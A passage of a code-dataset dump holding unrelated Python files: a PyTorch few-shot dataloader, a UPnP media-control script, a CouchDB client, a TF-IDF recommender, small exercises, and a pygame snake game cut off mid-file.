random(255)\n stroke(r,g,b,a)\n strokeWeight(random(0,3))\n noFill()\n ellipse(x, y+DY, i*dr, i*dr)\n\n #stroke(0, 0)\n #strokeWeight(1.5)\n #fill(r,g,b,a)\n #ellipse(x, y+DY, R, R)\n img.updatePixels()\n","sub_path":"Citrate droplets/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"604019682","text":"import os\nimport torch\nimport random\nimport pickle\nimport pandas as pd\nimport numpy as np\nfrom PIL import Image\nfrom torchvision import transforms, utils\nfrom torch.utils.data import Dataset, DataLoader\n\n#openImage = lambda x: Image.open(x)\n\ndef openImage(x):\n img = Image.open(x)\n if len(np.array(img).shape) != 3:\n print(x, len(np.array(img).shape))\n return img\n\nclass EpisodeDataset(Dataset):\n\n def __init__(self, data_root, phase='train', nway=5, kshot=1, kqry=15, transform=None, nepisode=100):\n\n self.data_root = data_root\n self.nway = nway\n self.kshot = kshot\n self.kqry = kqry\n self.nepisode = nepisode\n\n if phase == 'train':\n self.data_root += '/' + phase\n self.transform = transforms.Compose([openImage,\n transforms.Resize((84,84)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ])\n else:\n self.data_root += '/' + phase\n self.transform = transforms.Compose([openImage,\n transforms.Resize((84,84)),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225]),\n ])\n if transform != None:\n self.transform = transform\n\n classes = os.listdir(self.data_root)\n\n self.examples = {}\n for cls in classes:\n self.examples[cls] = [os.path.join(self.data_root, cls, filename) \\\n for filename in os.listdir(os.path.join(self.data_root, cls))]\n\n def __len__(self):\n return self.nepisode\n\n def __getitem__(self, idx):\n\n cls_selected = random.sample(self.examples.keys(), self.nway)\n\n spt = []\n qry = []\n for i, cls in enumerate(cls_selected):\n example_selected = random.sample(self.examples[cls], self.kshot+self.kqry)\n spt += [(i, example) for example in example_selected[:self.kshot]]\n qry += [(i, example) for example in example_selected[self.kshot:]]\n random.shuffle(spt)\n random.shuffle(qry)\n\n spt, qry = np.asarray(spt), np.asarray(qry)\n\n spt_label, spt_img = spt[:,0].astype(np.int64), spt[:,1]\n qry_label, qry_img = qry[:,0].astype(np.int64), qry[:,1]\n\n spt_label, qry_label = torch.from_numpy(spt_label), torch.from_numpy(qry_label)\n\n spt_img = torch.stack([self.transform(filename) for filename in spt_img])\n qry_img = torch.stack([self.transform(filename) for filename in qry_img])\n\n return (spt_img, spt_label), (qry_img, qry_label)\n\n\n","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":3020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"72987839","text":"#!/usr/bin/env python3\n\nimport html\nimport requests\nimport sys\n\nfrom xml.dom import minidom\nfrom xmlHelper import XmlHelper\n\nclass UpnpCommand:\n\n def __init__(self, host):\n self.host = host\n self.verbose = False\n\n def host_send(self, action, control_path, control_name, action_args):\n\n if self.host.startswith(\"http://\"):\n control_url = self.host + control_path\n host_name = self.host[7:]\n else:\n control_url = \"http://\" + self.host + control_path\n host_name = self.host\n\n body = ''\n body += ''\n body += ''\n body += '\t'\n body += action_args\n body += '\t'\n body += ''\n body += ''\n if self.verbose:\n print(body)\n headers = {'Host': host_name,\n 'User-Agent': 'xrf/1.0',\n 'Content-Type': 'text/xml; charset=\"utf-8\"',\n 'Content-Length': str(len(body)),\n 'SOAPAction': '\"urn:schemas-upnp-org:service:'+control_name+':1#'+action+'\"'}\n try:\n response = requests.post(control_url, data=body, headers=headers, verify=False)\n if response.status_code < 300:\n if self.verbose:\n print(response.content)\n result = minidom.parseString(response.content)\n if self.verbose:\n print(result.toprettyxml())\n return result\n else:\n print(\"query {0} returned status_code:{1}\".format(control_url,response.status_code))\n except Exception as e:\n print(\"host send error {0}\".format(e))\n return None\n\n def host_send_rendering(self, action, action_args):\n return self.host_send(action,\n \"/RenderingService/Control\",\n \"RenderingControl\",\n action_args)\n\n def host_send_transport(self, action, action_args):\n return self.host_send(action,\n \"/TransportService/Control\",\n \"AVTransport\",\n action_args)\n\n def host_send_contentdirectory(self, action, action_args):\n return self.host_send(action,\n \"/cd/Control\",\n \"ContentDirectory\",\n action_args)\n\n def play(self):\n xmlroot = self.host_send_transport(\"Play\", '01')\n return None\n\n def stop(self):\n xmlroot = self.host_send_transport(\"Stop\", '0')\n return None\n\n def seek(self, value):\n xmlroot = self.host_send_transport(\"Seek\",\n '0ABS_TIME'\n '' + value + '')\n return None\n\n def previous(self):\n xmlroot = self.host_send_transport(\"Previous\", '0')\n return None\n\n def next(self):\n xmlroot = self.host_send_transport(\"Next\", '0')\n return None\n\n def get_state_var(self):\n xmlroot = self.host_send_rendering(\"GetStateVariables\",\n '0<'\n 'StateVariableList>TransportStatus')\n return None\n\n def get_position_info(self):\n xmlroot = self.host_send_transport(\"GetPositionInfo\", '0')\n return XmlHelper.xml_extract_dict(xmlroot, ['Track',\n 'TrackDuration',\n 'TrackMetaData',\n 'TrackURI',\n 'RelTime',\n 'AbsTime',\n 'RelCount',\n 'AbsCount'])\n\n def get_transport_setting(self):\n xmlroot = self.host_send_transport(\"GetTransportSettings\", '0')\n return XmlHelper.xml_extract_dict(xmlroot, ['PlayMode'])\n\n def get_media_info(self):\n xmlroot = self.host_send_transport(\"GetMediaInfo\", '0')\n return XmlHelper.xml_extract_dict(xmlroot, ['PlayMedium', 'NrTracks', 'CurrentURI', 'CurrentURIMetaData'])\n\n def set_transport_uri(self, data):\n print(\"CurrentURI:\\n\" + data['CurrentURI'])\n print(\"CurrentURIMetaData:\\n\" + data['CurrentURIMetaData'])\n send_data = '0'\n add_uri = data['CurrentURI']\n if 'raumfeldname' in data:\n if data['raumfeldname'] == 'Station':\n if 'TrackURI' in data:\n add_uri = data['TrackURI']\n\n send_data += \"\"\n send_data += \"\" + html.escape(data['CurrentURIMetaData']) + \"\"\n # + html.escape(data['CurrentURIMetaData']) +\n 
print(data['CurrentURIMetaData'])\n xmlroot = self.host_send_transport(\"SetAVTransportURI\", send_data)\n return XmlHelper.xml_extract_dict(xmlroot, ['SetAVTransportURI'])\n\n '''Rendering service'''\n\n def get_volume(self):\n xmlroot = self.host_send_rendering(\"GetVolume\", '0Master')\n return XmlHelper.xml_extract_dict(xmlroot, ['CurrentVolume'])\n\n def set_volume(self, value):\n xmlroot = self.host_send_rendering(\"SetVolume\",\n '0Master' +\n '' + str(value) + '')\n return None\n\n\n def get_room_volume(self, uuid):\n xmlroot = self.host_send_rendering(\"GetRoomVolume\", '0'\n '' + uuid + '')\n return XmlHelper.xml_extract_dict(xmlroot, ['CurrentVolume'])\n\n\n def set_room_volume(self, uuid, value):\n xmlroot = self.host_send_rendering(\"SetVolume\",\n '0Master' +\n '' + str(value) + '' +\n '' + uuid + '')\n return None\n\n def get_browse_capabilites(self):\n xmlroot = self.host_send_contentdirectory(\"GetSearchCapabilities\", '')\n return XmlHelper.xml_extract_dict(xmlroot, ['SearchCaps'])\n\n def browse(self, path):\n browseData = \"\" + path +\"\" \\\n + \"BrowseMetadata\" \\\n + \"*\" \\\n + \"0\" \\\n + \"0\" \\\n + \"dc:title\"\n xmlroot = self.host_send_contentdirectory(\"Browse\", browseData)\n return XmlHelper.xml_extract_dict(xmlroot, ['Result', 'TotalMatches', 'NumberReturned'])\n\n def browsechildren(self, path):\n browseData = \"\" + path +\"\" \\\n + \"BrowseDirectChildren\" \\\n + \"*\" \\\n + \"0\" \\\n + \"0\" \\\n + \"dc:title\"\n xmlroot = self.host_send_contentdirectory(\"Browse\", browseData)\n return XmlHelper.xml_extract_dict(xmlroot, ['Result', 'TotalMatches', 'NumberReturned'])\n\n def browse_recursive_children(self, path, level=10):\n if level < 0:\n return\n result = self.browsechildren(path)\n if len(result) == 0:\n return\n xml_root = minidom.parseString(result['Result'])\n container_list = xml_root.getElementsByTagName(\"container\")\n for container in container_list:\n npath = container.attributes[\"id\"].value\n element = container.getElementsByTagName('dc:title')\n if element[0].firstChild is not None:\n title = element[0].firstChild.nodeValue\n print(\"C\", npath, \"-\", title)\n self.browse_recursive_children(npath,level-1)\n item_list = xml_root.getElementsByTagName(\"item\")\n for item in item_list:\n item_id = item.attributes[\"id\"].value\n element = item.getElementsByTagName('dc:title')\n title = element[0].firstChild.nodeValue\n if element[0].firstChild is not None:\n print(\"+\", path, \"-\", item_id, \"-\", title)\n\n\ndef usage(argv):\n print(\"Usage: \" + argv[0] + \" ip:port [COMMAND|INFO] {args}\")\n print(\"COMMAND: \")\n print(\" play play last stuff\")\n print(\" stop stop current playing\")\n print(\" setv vol set volume args=0..100\")\n print(\" seek pos seek to position args=00:00:00 ... 
99:59:59\")\n print(\"INFO: \")\n print(\" getv get volume info\")\n print(\" position GetPositionInfo \")\n print(\" media GetMediaInfo\")\n print(\" transport GetTransportSettings \")\n print(\" allinfo all infos in one call \")\n print(\"BROWSE: \")\n print(\" cap get browse capabilities\")\n print(\" browse path Browse for data\")\n print(\" browsechildren path Browse for data append /* for recursive\")\n\n\ndef main(argv):\n if len(sys.argv) < 3:\n usage(sys.argv)\n sys.exit(2)\n\n host = sys.argv[1]\n uc = UpnpCommand(host)\n operation = sys.argv[2]\n result = None\n if operation == 'play':\n result = uc.play()\n elif operation == 'stop':\n result = uc.stop()\n elif operation == 'getv':\n result = uc.get_volume()\n elif operation == 'setv':\n result = uc.set_volume(sys.argv[3])\n elif operation == 'seek':\n result = uc.seek(sys.argv[3])\n elif operation == 'prev':\n result = uc.previous()\n elif operation == 'next':\n result = uc.next()\n elif operation == 'position':\n result = uc.get_position_info()\n elif operation == 'transport':\n result = uc.get_transport_setting()\n elif operation == 'getstatevar':\n result = uc.get_state_var()\n elif operation == 'media':\n result = uc.get_media_info()\n result += uc.get_position_info()\n elif operation == 'allinfo':\n result = uc.get_volume()\n result += uc.get_position_info()\n result += uc.get_transport_setting()\n result += uc.get_media_info()\n elif operation == 'cap':\n result = uc.get_browse_capabilites()\n elif operation == 'browse':\n result = uc.browse(argv[3])\n xmlRoot = minidom.parseString(result['Result'])\n print(xmlRoot.toprettyxml(indent=\"\\t\"))\n elif operation == 'browsechildren':\n if argv[3].endswith('/*'):\n result = uc.browse_recursive_children(argv[3][:-2])\n print(result)\n else:\n result = uc.browsechildren(argv[3])\n xmlRoot = minidom.parseString(result['Result'])\n print(xmlRoot.toprettyxml(indent=\"\\t\"))\n return\n\n else:\n usage(sys.argv)\n print(result)\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n\n\n''' Transport\n\n\ndlna-playcontainer://uuid%3A3b06960d-f950-476c-8118-ad55893741d6\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0%2FMy%20Music%2FAlbums%2FJeff%2520Beck%2BYou%2520Had%2520It%2520Coming\n&md=0\n{\ndlna-playcontainer://uuid:3b06960d-f950-476c-8118-ad55893741d6\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0/My%20Music/Albums/Jeff%2520Beck%2BYou%2520Had%2520It%2520Coming\n&md=0\n&fii=0\",\ndlna-playcontainer://uuid:3b06960d-f950-476c-8118-ad55893741d6\n\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0/My%20Music/Albums/Jeff%2520Beck%2BYou%2520Had%2520It%2520Coming\n&md=0&fii=0\n\n\n'dlna-playcontainer://\nuuid%3A3\nb06960d-f950-476c-8118-ad55893741d6\n?sid=urn%3Aupnp-org%3AserviceId%3AContentDirectory\n&cid=0%2FMy%20Music%2FArtists%2FAl%2520Di%2520Meola%2FAl%2520Di%2520Meola%2BElegant%2520Gypsy\n&md=0\n&fii=0'\n\n\n\"http://opml.radiotime.com/Tune.ashx?id=s56065&formats=wma,mp3,ogg&partnerId=7aJ9pvV5&serial=54:4a:16:7f:16:82\",\n\nLineIn: Uri\n\"http://192.168.2.110:8888/stream.flac\",\n\n\n;http://192.168.2.110:42970\n/874a359d-1c7c-4816-bc44-e0bb170709c7\n/f8dc41ab-6b7c-4d07-8095-30d6bdcabb9a\n/93b5a7d0-17c4-48f0-b317-ac8b5d50b7d1\n/4c84a0a1c1d403d9f2273056d22b9527--2112583696-0-0.flac</res></item></DIDL-Lite> \"/>\n\t\t\n\t\t\n\n\"Pause\": {\n \"InstanceID\": {\n\"SetAVTransportURI\": {\n \"CurrentURI\": {\n \"relatedStateVariable\": \"AVTransportURI\"\n \"CurrentURIMetaData\": {\n \"relatedStateVariable\": \"AVTransportURIMetaData\"\n \"InstanceID\": 
{\n\"SetNextAVTransportURI\": {\n \"InstanceID\": {\n \"NextURI\": {\n \"relatedStateVariable\": \"AVTransportURI\"\n \"NextURIMetaData\": {\n \"relatedStateVariable\": \"AVTransportURIMetaData\"\n\"SetNextStartTriggerTime\": {\n \"InstanceID\": {\n \"StartTime\": {\n \"TimeService\": {\n\"SetPlayMode\": {\n \"InstanceID\": {\n \"NewPlayMode\": {\n'''\n\n'''\n\"GetMute\": {\n \"Channel\": {\n \"InstanceID\": {\n\"GetRoomMute\": {\n \"InstanceID\": {\n \"Room\": \"relatedStateVariable\": \"UUID\"\n\"GetRoomVolume\": {\n \"InstanceID\": {\n \"relatedStateVariable\": \"A_ARG_TYPE_InstanceID\"\n \"Room\": \"relatedStateVariable\": \"UUID\"\n\"SetMute\": {\n \"Channel\": {\n \"DesiredMute\": {\n \"InstanceID\": {\n\"SetRoomMute\": {\n \"DesiredMute\": {\n \"InstanceID\": {\n \"Room\":\"relatedStateVariable\": \"UUID\"\n\"SetRoomVolume\": {\n \"DesiredVolume\": {\n \"InstanceID\": {\n \"Room\": \"relatedStateVariable\": \"UUID\"\n'''\n","sub_path":"upnpCommand.py","file_name":"upnpCommand.py","file_ext":"py","file_size_in_byte":14553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"179605571","text":"# Let's play with functions a little bit more\n\n# 1. The syntax of definining a function\ndef sample_function():\n\tprint(\"this is the most basic syntax of function\")\n\nsample_function()\n\n# 2. Taking arguments and un-determined arguments:\ndef multi_arg_function(arg1, arg2, *arg3):\n\tprint(\"First argument\",arg1)\n\tprint(\"Second argument\",arg2)\n\tprint(\"Last argument\",arg3)\nmulti_arg_function(1,2,3,4,5,6,7)\n\n# 3. Function with pre-defined value ()\ndef pre_defined_sum(a = 1, b = 1):\n\treturn (a+b)\nprint(\"when passing no value:\",pre_defined_sum())\nprint(\"when adding 2 and 2:\",pre_defined_sum(2,2))\n\n# 4. To pass a dictionary, use **. ** is for dictionary\ndef dict_function(**dict_arg):\n\tfor key, value in dict_arg.items():\n\t\tprint(key,\"-\",value)\nname1 = \"str_as_key\"\ndict_ = {\n\t'a':1,\n\t'b':2,\n\t'c':3\n}\ndict_function(a = 1,b = 2,c = 3)\n# dict_function(dict_)","sub_path":"Python/04_Function.py","file_name":"04_Function.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"198246031","text":"def load_state_dict(self, state_dict):\n \"Copies parameters and buffers from :attr:`state_dict` into\\n this module and its descendants. The keys of :attr:`state_dict` must\\n exactly match the keys returned by this module's :func:`state_dict()`\\n function.\\n\\n Arguments:\\n state_dict (dict): A dict containing parameters and\\n persistent buffers.\\n \"\n own_state = self.state_dict()\n for (name, param) in state_dict.items():\n if (name not in own_state):\n raise KeyError('unexpected key \"{}\" in state_dict'.format(name))\n if isinstance(param, Parameter):\n param = param.data\n own_state[name].copy_(param)\n missing = (set(own_state.keys()) - set(state_dict.keys()))\n if (len(missing) > 0):\n raise KeyError('missing keys in state_dict: \"{}\"'.format(missing))","sub_path":"Data Set/bug-fixing-5/95ccbf8b0b29bc0d285367c7de693fb24628bd26--bug.py","file_name":"95ccbf8b0b29bc0d285367c7de693fb24628bd26--bug.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"44498084","text":"import json\nimport pandas as pd\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import linear_kernel\n\ndef clean_data_actual():\n\n\tprojects = []\n\tstatus_value = {'Rejected':-1,'Starred':0,'Approved':1}\n\n\twith open('nlp/Untitled.json') as f:\n\t\tfor line in f:\n\t\t\trow = []\n\t\t\tdata = json.loads(line)\n\n\t\t\trow.append(data['idea_id']['$numberInt'])\n\t\t\trow.append(data['title'])\n\t\t\trow.append(data['abstract'])\n\t\t\trow.append(status_value[data['status']])\n\t\t\trow.append(data['like_count']['$numberInt'])\n\t\t\trow.append(data['dislike_count']['$numberInt'])\n\n\t\t\t#print(str(idea_id)+\" \"+data['title']+\" \"+str(status_value[data['status']])+\" \"+str(like_count)+\" \"+str(like_count))\n\t\t\tprojects.append(row)\n\n\tdf = pd.DataFrame(projects,columns=['idea_id','title','abstract','status','like_count','dislike_count'])\n\treturn df\n\ndef get_recommendations(df,title,indices,cosine_sim,n_rec=3):\n\tidx = indices[title]\n\tsim_scores = list(enumerate(cosine_sim[idx]))\n\tsim_scores = sorted(sim_scores, key=lambda x: x[1], reverse=True)\n\tsim_scores = sim_scores[1:(n_rec+1)]\n\n\tmovie_indices = [i[0] for i in sim_scores]\n\treturn df['title'].iloc[movie_indices]\n\ndef get_param():\n\n\tdf = clean_data_actual()\n\t#print(df['abstract'].head())\n\ttfidf = TfidfVectorizer(stop_words='english')\n\ttfidf_matrix = tfidf.fit_transform(df['abstract'])\n\t#print(tfidf_matrix.shape)\n\tcosine_sim = linear_kernel(tfidf_matrix, tfidf_matrix)\n\tindices = pd.Series(df.index, index=df['title']).drop_duplicates()\n\n\treturn df,cosine_sim,indices\n\ndf,cosine_sim,indices = get_param()\ndf = get_recommendations(df,\"Food Recommender\",indices,cosine_sim)\n\nprint(df.values.tolist())","sub_path":"nlp/analyse.py","file_name":"analyse.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"217690771","text":"# -*-coding: utf-8 -*-\nimport math\nimport cmath\n\n\n# 10-6\ndef myopen(fn, mode='r', encoding='utf-8'):\n try:\n f = open(fn, mode, encoding=encoding)\n return f\n except BaseException as e:\n return None\n\n\n# 10-8\ndef safe_input(output):\n try:\n s = input(output)\n return s\n except (EOFError, KeyboardInterrupt) as e:\n print(e)\n return None\n\n\n# 10-9\ndef safe_sqrt(num):\n try:\n return math.sqrt(num)\n except ValueError as ve:\n return cmath.sqrt(num)\n\n\ndef test():\n # 10-6 test\n print(myopen('nofile'))\n print(myopen('../ch9/doc.txt'))\n # 10-8 test\n # print(safe_input('请输入:\\n'))\n # 10-9 test\n print(safe_sqrt(-1))\n\nif __name__ == '__main__':\n test()\n\n","sub_path":"ch10/practice.py","file_name":"practice.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"208105683","text":"class Fraccion:\r\n \r\n\r\n def __init__(self, num, den):\r\n self.num = num\r\n self.den = den\r\n \r\n \r\n def imprime(self):\r\n print(self.num, \"/\", self.den)\r\n\r\n def multiplicar(self, b):\r\n n = self.num * b.num\r\n d = self.den * b.den\r\n r = Fraccion(n,d)\r\n return r\r\n \r\n \r\n \r\n \r\ndef main():\r\n\r\n a = Fraccion(3,2)\r\n a.imprime()\r\n\r\n b = Fraccion(7,4)\r\n b.imprime()\r\n\r\n r = a.multiplicar(b)\r\n r.imprime()\r\n \r\n\r\n \r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n \r\n \r\n","sub_path":"Clases_y_objetos.py","file_name":"Clases_y_objetos.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"6682553","text":"from json import dumps, loads\n\nimport urllib\n\n\nclass CouchDBInterface():\n \"\"\"\n CoucDB interface class. Provides simple methods to interact with database,\n \"\"\"\n def __init__(self, dbname, url='http://localhost:5984/', lucene_url='http://localhost:5985/', queue_size=1000):\n self.__dbname = dbname\n self.__dburl = url\n self.__lucene_url = lucene_url\n self.__queuesize = queue_size\n self.__opener = urllib.request.build_opener(urllib.request.HTTPHandler)\n self.reset_queue()\n\n def reset_queue(self):\n \"\"\"\n Clear batch actions queue.\n \"\"\"\n self.__queue = []\n\n def construct_request(self, url, db_url=None, method='GET', headers=None, data=None):\n \"\"\"\n Method to construct a HTTP request to database\n \"\"\"\n if headers is None:\n headers = {}\n\n headers['Content-Type'] = 'application/json'\n if db_url is None:\n db_url = self.__dburl\n\n if data is None:\n request = urllib.request.Request(db_url + url,\n headers=headers,\n method=method)\n else:\n request = urllib.request.Request(db_url + url,\n headers=headers,\n data=dumps(data).encode('utf-8'),\n method=method)\n\n # print('Construct request: %s' % (db_url + url))\n return request\n\n def to_json_query(self, params):\n \"\"\"\n Converts object to properly encoded JSON in utf-8\n \"\"\"\n stringfied = dict()\n for p in params:\n if isinstance(params[p], str):\n stringfied[p] = params[p]\n else:\n stringfied[p] = dumps(params[p])\n\n return urllib.parse.urlencode(stringfied)\n\n def get_document(self, doc_id, rev=None):\n \"\"\"\n Get a single document from database\n \"\"\"\n if rev is None:\n db_request = self.construct_request('%s/%s' % (self.__dbname,\n doc_id))\n else:\n db_request = self.construct_request('%s/%s?rev=%s' % (self.__dbname,\n doc_id,\n rev))\n\n data = self.__open(db_request)\n return data\n\n def load_view(self, view_name, options=None):\n \"\"\"\n Query couchDB view with optional query parameters\n \"\"\"\n if options is None:\n db_request = self.construct_request(\"%s/%s\" % (self.__dbname,\n view_name))\n else:\n db_request = self.construct_request(\"%s/%s?%s\" % (self.__dbname,\n view_name,\n self.to_json_query(options)))\n\n data = self.__open(db_request)\n return data\n\n def commit_one(self, doc):\n \"\"\"\n Put single document to couchDB, _id can be specified in to-be written document object\n \"\"\"\n db_request = self.construct_request(self.__dbname, method='POST', data=doc)\n data = self.__open(db_request)\n return data\n\n def delete_doc(self, doc_id, rev=None):\n \"\"\"\n Mark document as deleted and commit to couchDB\n \"\"\"\n tmp_doc = self.document(doc_id, rev)\n tmp_doc[\"_deleted\"] = True\n data = self.commit_one(tmp_doc)\n return data\n\n def enqueue(self, doc):\n \"\"\"\n Add a document to queue list. If queue is full - commit\n \"\"\"\n self.__queue.append(doc)\n if len(self.__queue) >= self.__queuesize:\n self.commit()\n\n def commit(self, doc=None):\n \"\"\"\n Commit queue to DB. if wanted to commit single doc -> it is added to queue\n \"\"\"\n if doc is not None:\n self.enqueue(doc)\n\n if len(self.__queue) == 0:\n return\n\n to_send = dict()\n to_send['docs'] = self.__queue\n db_request = self.construct_request('%s/_bulk_docs/' % (self.__dbname),\n method='POST',\n data=doc)\n retval = self.__open(db_request)\n self.reset_queue()\n return retval\n\n def document_exists(self, doc_id, rev=None):\n \"\"\"\n Check if a document exists by ID. 
If specified check that the revision rev exists\n \"\"\"\n url = '/%s/%s' % (self.__dbname, doc_id)\n if rev:\n url += '?rev=%s' % (rev)\n\n try:\n db_request = self.construct_request(url, method='HEAD')\n self.__open(db_request)\n return True\n except Exception:\n return False\n\n def fti_search(self, query, options=None):\n \"\"\"\n Query couchDB view with optional query parameters using couchdb-lucene (fti)\n \"\"\"\n if 'key' in options:\n options['key'] = '\"' + str(options['key']) + '\"'\n\n # localhost:5985/local/campaigns/_design/lucene/search?q=prepid:First*&include_docs=true\n db_request = self.construct_request('local/%s/_design/lucene/search?q=%s&%s' % (self.__dbname,\n query,\n self.to_json_query(options)),\n db_url=self.__lucene_url)\n data = self.__open(db_request)\n return data\n\n def get_update_sequence(self, options=None):\n \"\"\"\n Get database update sequence information\n \"\"\"\n if options is None:\n options = {}\n\n options[\"_info\"] = True\n db_request = self.construct_request('%s?%s' % (self.__dbname,\n self.to_json_query(options)))\n data = self.__open(db_request)\n return data[\"update_seq\"]\n\n def count(self):\n \"\"\"\n Return number of documents in database\n \"\"\"\n db_request = self.construct_request(self.__dbname)\n data = self.__open(db_request)\n return data[\"doc_count\"]\n\n def __open(self, request):\n data = self.__opener.open(request)\n result = data.read().decode('utf-8')\n if not result:\n return {}\n\n result = loads(result)\n return result\n","sub_path":"couchdb_layer/couchdb_interface.py","file_name":"couchdb_interface.py","file_ext":"py","file_size_in_byte":6633,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"482387214","text":"import tsplib95 as tsp\nimport numpy as np\nfrom scipy.spatial import distance_matrix\n\npathA = \"kroA200.tsp\"\npathB = \"kroB200.tsp\"\n\n\nclass PrepareData:\n\n def __init__(self, path):\n self.data = tsp.load_problem(path)\n self.coordinates = self.get_coords()\n self.distance_matrix = self.calculate_distance_matrix()\n\n def get_coords(self):\n cords_dict = self.data.node_coords\n coordinates = []\n for k in cords_dict.keys():\n coordinates.append(cords_dict.get(k))\n return np.array(coordinates)\n\n def calculate_distance_matrix(self):\n matrix_of_distances = distance_matrix(self.coordinates, self.coordinates)\n matrix_of_distances = np.rint(matrix_of_distances)\n matrix_of_distances = matrix_of_distances.astype(int)\n return matrix_of_distances\n\n\ndef shortest_next(distances_matrix, visited, last):\n new_row_of_distance_matrix = distances_matrix[last].copy()\n max_value = np.max(new_row_of_distance_matrix)\n new_row_of_distance_matrix[last] = 2*max_value\n for v in visited:\n new_row_of_distance_matrix[v] = 2*max_value\n return np.argmin(new_row_of_distance_matrix)","sub_path":"preparedata.py","file_name":"preparedata.py","file_ext":"py","file_size_in_byte":1172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"}
+{"seq_id":"58478109","text":"# -*- coding: utf-8 -*-\n'''\n1、控制小蛇的运动\n2、检测是否发生碰撞\n3、游戏失败提示\n'''\n\nimport pygame # 导入pygame库\nfrom pygame.locals import * # 导入pygame库中的一些常量\nfrom sys import exit # 导入sys库中的exit函数\nfrom random import randint\n\nSCREEN_WIDTH, SCREEN_HEIGHT = 640, 480 # 定义窗口的分辨率\nclock = pygame.time.Clock() # 时钟,用于设置游戏帧率\n\n# 初始化\npygame.init() # 初始化pygame\nscreen = pygame.display.set_mode([SCREEN_WIDTH, SCREEN_HEIGHT]) # 初始化窗口\npygame.display.set_caption('贪吃蛇') # 设置窗口标题\n\n# 图片资源\nstart_img = pygame.image.load('res/start.jpg') # 开始图\nback_img = pygame.image.load('res/back.jpg') # 背景图\nfail_img = pygame.image.load('res/fail.png') # 失败图\n\n\n##############################################################\n\n\n# 定义一些常量\nGRID_SIZE = 20 # 格子大小\nX_MAX = SCREEN_WIDTH / GRID_SIZE\nY_MAX = SCREEN_HEIGHT / GRID_SIZE\n# 四个运动方向\nDIRE_LEFT, DIRE_RIGHT, DIRE_UP, DIRE_DOWN = [-1, 0], [1, 0], [0, -1], [0, 1]\nKEY_DIRECTION = {pygame.K_LEFT: DIRE_LEFT, pygame.K_RIGHT: DIRE_RIGHT,\n pygame.K_UP: DIRE_UP, pygame.K_DOWN: DIRE_DOWN}\n\n\nclass SnakeBlock(pygame.sprite.Sprite):\n '蛇身 精灵'\n OUTER_RECT = pygame.Rect(0, 0, 20, 20)\n INNER_RECT = pygame.Rect(4, 4, 12, 12)\n OUTER_COLOR = (0, 0, 255)\n INNER_COLOR = (173, 216, 230)\n\n def __init__(self, x, y):\n super().__init__()\n # 绘制蛇身\n surface = pygame.Surface([GRID_SIZE, GRID_SIZE])\n pygame.draw.rect(surface, self.OUTER_COLOR, self.OUTER_RECT)\n pygame.draw.rect(surface, self.INNER_COLOR, self.INNER_RECT)\n # 初始化\n self.image = surface\n self.rect = self.image.get_rect()\n self.rect.topleft = [GRID_SIZE * x, GRID_SIZE * y]\n # 蛇身运动方向\n self.direction = DIRE_RIGHT\n\n def update(self):\n self.rect.left += GRID_SIZE * self.direction[0]\n self.rect.top += GRID_SIZE * self.direction[1]\n\n\nclass Snake(pygame.sprite.Group):\n '小蛇 组'\n\n def __init__(self):\n '初始化,创建三节蛇身'\n super().__init__()\n self.add(SnakeBlock(X_MAX/2, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 1, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 2, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 3, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 4, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 5, Y_MAX/2))\n self.add(SnakeBlock(X_MAX/2 - 6, Y_MAX/2))\n\n def __del__(self):\n '析构函数'\n self.empty()\n\n def SetDirection(self, direction):\n ''''\n 设置方向。\n 小蛇的运动方向 就是蛇头的运动方向'\n 上下运动时才能向左/右,左右运动时才能向上/下\n '''\n st = self.sprites()[0]\n if direction in [DIRE_LEFT, DIRE_RIGHT] and st.direction in [DIRE_UP, DIRE_DOWN]:\n st.direction = direction\n elif direction in [DIRE_UP, DIRE_DOWN] and st.direction in [DIRE_LEFT, DIRE_RIGHT]:\n st.direction = direction\n\n def ChangeDirection(self):\n ''\n # 依次改变蛇身运动方向为上一段(第一段不变)\n pre_direction = DIRE_RIGHT # 记录上一段蛇身的运动方向\n for (i, s) in enumerate(self):\n t = s.direction\n if i > 0: # 改为上一段蛇身的运动方向\n s.direction = pre_direction\n pre_direction = t\n\n def Collide(self):\n '检测是否发生碰撞'\n return self.CollideBox() or self.CollideSelf()\n\n def CollideBox(self):\n '检测是否碰撞边沿'\n rect = self.sprites()[0].rect\n return rect.left < 0 or rect.right > 